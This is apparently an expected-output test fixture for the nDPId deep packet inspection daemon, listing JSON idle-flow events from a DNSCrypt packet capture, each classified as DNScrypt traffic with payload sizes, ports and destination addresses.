-00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396111,"flow_last_seen":946739396214,"flow_idle_time":200000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1664,"flow_avg_l4_payload_len":832,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":55185,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304628,"flow_last_seen":946739304793,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":56043,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311153,"flow_last_seen":946739311308,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":38879,"dst_port":553,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739306241,"flow_last_seen":946739306435,"flow_idle_time":200000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":831,"flow_avg_l4_payload_len":415,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":38283,"dst_port":1443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312105,"flow_last_seen":946739312132,"flow_idle_time":200000,"flow_min_l4_payload_len":189,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1661,"flow_avg_l4_payload_len":830,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":33521,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317403,"flow_last_seen":946739317432,"flow_idle_time":200000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1659,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":46066,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946735705349,"flow_last_seen":946739305459,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":3312,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":35228,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739337184,"flow_last_seen":946739337184,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":58650,"dst_port":465,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739299327,"flow_last_seen":946739299356,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":52636,"dst_port":1053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305192,"flow_last_seen":946739305217,"flow_idle_time":200000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":692,"flow_avg_l4_payload_len":346,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":44093,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318038,"flow_last_seen":946739318059,"flow_idle_time":200000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1659,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":45497,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337048,"flow_last_seen":946739337079,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":39910,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739312402,"flow_last_seen":946739312402,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":58113,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312286,"flow_last_seen":946739312401,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":48448,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396070,"flow_last_seen":946739396113,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":49177,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304628,"flow_last_seen":946739304791,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":56177,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739348756,"flow_last_seen":946739348804,"flow_idle_time":200000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1655,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":44469,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305327,"flow_last_seen":946739305351,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1515,"flow_avg_l4_payload_len":757,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":56022,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305219,"flow_last_seen":946739305330,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":60962,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304599,"flow_last_seen":946739304629,"flow_idle_time":200000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1651,"flow_avg_l4_payload_len":825,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":59367,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305155,"flow_last_seen":946739305194,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":59194,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739380983,"flow_last_seen":946739381015,"flow_idle_time":200000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":691,"flow_avg_l4_payload_len":345,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":46646,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739391046,"flow_last_seen":946739391308,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":59400,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739380983,"flow_last_seen":946739381016,"flow_idle_time":200000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":691,"flow_avg_l4_payload_len":345,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":58948,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739306241,"flow_last_seen":946739306435,"flow_idle_time":200000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1791,"flow_avg_l4_payload_len":895,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":56902,"dst_port":1443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312105,"flow_last_seen":946739312133,"flow_idle_time":200000,"flow_min_l4_payload_len":189,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":701,"flow_avg_l4_payload_len":350,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":45993,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317403,"flow_last_seen":946739317429,"flow_idle_time":200000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":699,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":56494,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337078,"flow_last_seen":946739337184,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":36930,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304599,"flow_last_seen":946739304626,"flow_idle_time":200000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":691,"flow_avg_l4_payload_len":345,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":32793,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337184,"flow_last_seen":946739337214,"flow_idle_time":200000,"flow_min_l4_payload_len":195,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":707,"flow_avg_l4_payload_len":353,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":44496,"dst_port":465,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317462,"flow_last_seen":946739317496,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":52221,"dst_port":2053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304328,"flow_last_seen":946739304360,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":50435,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305192,"flow_last_seen":946739305220,"flow_idle_time":200000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1652,"flow_avg_l4_payload_len":826,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":44282,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318038,"flow_last_seen":946739318063,"flow_idle_time":200000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1659,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":47729,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318038,"flow_last_seen":946739318059,"flow_idle_time":200000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":699,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":53876,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318061,"flow_last_seen":946739318164,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":59011,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739380804,"flow_last_seen":946739380834,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":52056,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946735705348,"flow_last_seen":946739305457,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":3312,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":45722,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946735705348,"flow_last_seen":946739305460,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":3312,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":35495,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739348756,"flow_last_seen":946739348805,"flow_idle_time":200000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1655,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":38482,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
